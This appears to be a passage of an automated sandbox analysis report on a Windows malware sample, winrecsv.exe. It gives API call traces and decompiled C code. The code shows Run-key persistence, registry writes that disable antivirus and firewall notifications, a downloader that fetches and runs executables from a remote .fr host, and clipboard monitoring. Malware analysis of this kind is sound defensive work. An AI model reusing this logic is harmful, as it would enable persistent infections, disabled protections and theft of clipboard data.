                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winrecsv.exe,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(C:\Windows\winrecsv.exe), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00404000,00000000,00000000,00000000), ref: 00406814
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,004050B0,00000000,00000000,00000000), ref: 00406834
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00405900,00000000,00000000,00000000), ref: 00406854
                                                                                  • Sleep.KERNELBASE(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tncmds.dat$C:\Users\user\tnnodes.dat$C:\Windows\winrecsv.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-1332927177
                                                                                  • Opcode ID: 225aaf5d50bbc80c1c59e5006c2e5804e7773863bb7f647180ff1c9cfd19a09c
                                                                                  • Instruction ID: 5381a988ab4d71a95ab7e29ec0f43e912bf8196cdff92c6a99a63db8bd3eacf6
                                                                                  • Opcode Fuzzy Hash: 225aaf5d50bbc80c1c59e5006c2e5804e7773863bb7f647180ff1c9cfd19a09c
                                                                                  • Instruction Fuzzy Hash: 5472EF71680314ABD7209F90AC4AFD97B74BB48B06F2085A5F709B61D0DAF85AC4CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				void* _t112;
                                                                                  				void* _t115;
                                                                                  				int _t119;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_t112 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0); // executed
                                                                                  					_v1576 = _t112;
                                                                                  					if(_v1576 != 0) {
                                                                                  						_t115 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  						_v1580 = _t115;
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(1) {
                                                                                  								_t119 = InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372); // executed
                                                                                  								if(_t119 == 0 || _v2372 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0); // executed
                                                                                  							}
                                                                                  							FindCloseChangeNotification(_v1580); // executed
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524); // executed
                                                                                  							Sleep(0x3e8); // executed
                                                                                  							_t125 = E0040D580( &_v1572); // executed
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572); // executed
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040D899
                                                                                  • srand.MSVCRT ref: 0040D8A0
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
                                                                                  • mbstowcs.NTDLL ref: 0040D923
                                                                                  • rand.MSVCRT ref: 0040D92B
                                                                                  • rand.MSVCRT ref: 0040D93F
                                                                                  • wsprintfW.USER32 ref: 0040D966
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
                                                                                  • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040DA3E
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040DA4D
                                                                                  • wsprintfW.USER32 ref: 0040DA66
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 0040DA76
                                                                                  • ExitProcess.KERNEL32 ref: 0040DACA
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DAA2
                                                                                    • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
                                                                                    • Part of subcall function 0040D740: CreateProcessW.KERNELBASE ref: 0040D795
                                                                                    • Part of subcall function 0040D740: Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DAE0
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DAED
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DAFA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DB07
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DB12
                                                                                  • rand.MSVCRT ref: 0040DB27
                                                                                  • Sleep.KERNEL32 ref: 0040DB3E
                                                                                  • rand.MSVCRT ref: 0040DB44
                                                                                  • rand.MSVCRT ref: 0040DB58
                                                                                  • wsprintfW.USER32 ref: 0040DB7F
                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
                                                                                  • wsprintfW.USER32 ref: 0040DBBC
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DBCC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DBD7
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040DA81
                                                                                    • Part of subcall function 0040D580: CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040D580: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                    • Part of subcall function 0040D580: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                    • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DBF8
                                                                                  • ExitProcess.KERNEL32 ref: 0040DC1F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DC2E
                                                                                  Strings
                                                                                  • %s\%d%d.exe, xrefs: 0040D95A
                                                                                  • %s\%d%d.exe, xrefs: 0040DB73
                                                                                  • %s:Zone.Identifier, xrefs: 0040DA5A
                                                                                  • %temp%, xrefs: 0040D8BB
                                                                                  • %s:Zone.Identifier, xrefs: 0040DBB0
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeletewsprintf$HandleProcess$ExitOpen$ChangeCountDownloadEnvironmentExpandFindMappingNotificationReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 48925641-2996245764
                                                                                  • Opcode ID: dfcc159c14f6122df4d80fa0c7757af7993130a48c708c2244381bfec5c2806d
                                                                                  • Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
                                                                                  • Opcode Fuzzy Hash: dfcc159c14f6122df4d80fa0c7757af7993130a48c708c2244381bfec5c2806d
                                                                                  • Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 94%
                                                                                  			E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				int _v12;
                                                                                  				struct HWND__* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				short _v26;
                                                                                  				short _v30;
                                                                                  				int _v32;
                                                                                  				short _v34;
                                                                                  				char _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				long _t75;
                                                                                  				struct HWND__* _t90;
                                                                                  				struct HWND__* _t97;
                                                                                  				struct HWND__* _t98;
                                                                                  				void* _t129;
                                                                                  
                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                  				_v40 = _a8;
                                                                                  				if(_v40 > 0x308) {
                                                                                  					if(_v40 == 0x30d) {
                                                                                  						if(_a12 != _v8) {
                                                                                  							if(_v8 != 0) {
                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v8 = _a16;
                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  						}
                                                                                  						goto L38;
                                                                                  					} else {
                                                                                  						L38:
                                                                                  						_t75 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                  						return _t75;
                                                                                  					}
                                                                                  				}
                                                                                  				if(_v40 == 0x308) {
                                                                                  					_v12 = 0;
                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                  								_v12 = 7;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v12 = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v12 = 0xd;
                                                                                  					}
                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                  						L34:
                                                                                  						if(_v8 != 0) {
                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                  						if(_v24 != 0) {
                                                                                  							_v20 = GlobalLock(_v24);
                                                                                  							if(_v20 != 0) {
                                                                                  								_v16 = 0;
                                                                                  								_v44 = _v12;
                                                                                  								if(_v44 == 1) {
                                                                                  									_t90 = E0040B570(_v20, 0, 0);
                                                                                  									_t129 = _t129 + 0xc;
                                                                                  									_v16 = _t90;
                                                                                  								} else {
                                                                                  									if(_v44 == 7) {
                                                                                  										_t97 = E00403CE0(_v20, 0, 0);
                                                                                  										_t129 = _t129 + 0xc;
                                                                                  										_v16 = _t97;
                                                                                  									} else {
                                                                                  										if(_v44 == 0xd) {
                                                                                  											_t98 = E00403BD0(_v20, _v20, 0);
                                                                                  											_t129 = _t129 + 8;
                                                                                  											_v16 = _t98;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								GlobalUnlock(_v24);
                                                                                  								CloseClipboard();
                                                                                  								if(_v16 != 0) {
                                                                                  									E00403480(_v16);
                                                                                  									E00408FB0(_v16);
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L38;
                                                                                  				}
                                                                                  				if(_v40 == 1) {
                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  				} else {
                                                                                  					if(_v40 == 2) {
                                                                                  						_v36 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v36 = 1;
                                                                                  						_v34 = 6;
                                                                                  						_v32 = 1;
                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                  					}
                                                                                  				}
                                                                                  				goto L38;
                                                                                  			}

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403EB7
                                                                                  • GetClipboardData.USER32 ref: 00403EC9
                                                                                  • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00403FD0
                                                                                  • ChangeClipboardChain.USER32(?,?), ref: 00403FDE
                                                                                  • DefWindowProcA.USER32(?,?,?,?), ref: 00403FF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                  • String ID:
                                                                                  • API String ID: 3549449529-0
                                                                                  • Opcode ID: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction ID: 0016380ad0389118889d1cf690c65c1d7a98e8f3a274b3db5f7ad41e70fd50c0
                                                                                  • Opcode Fuzzy Hash: f4f9e6eb7439ff84bcf16bc7885a33df19b568e264b9036bfc36b825d851087e
                                                                                  • Instruction Fuzzy Hash: B3713D75D00209EFDB14DFA4D848BEEBBB8BF48306F14852AF505B6290D7799B40CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 51%
                                                                                  			E004050B0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				short _v24;
                                                                                  				short _v556;
                                                                                  				short _v2604;
                                                                                  				intOrPtr _v2608;
                                                                                  				union _ULARGE_INTEGER _v2612;
                                                                                  				long _v2616;
                                                                                  				short _v3148;
                                                                                  				intOrPtr _v3152;
                                                                                  				intOrPtr _t34;
                                                                                  				intOrPtr _t36;
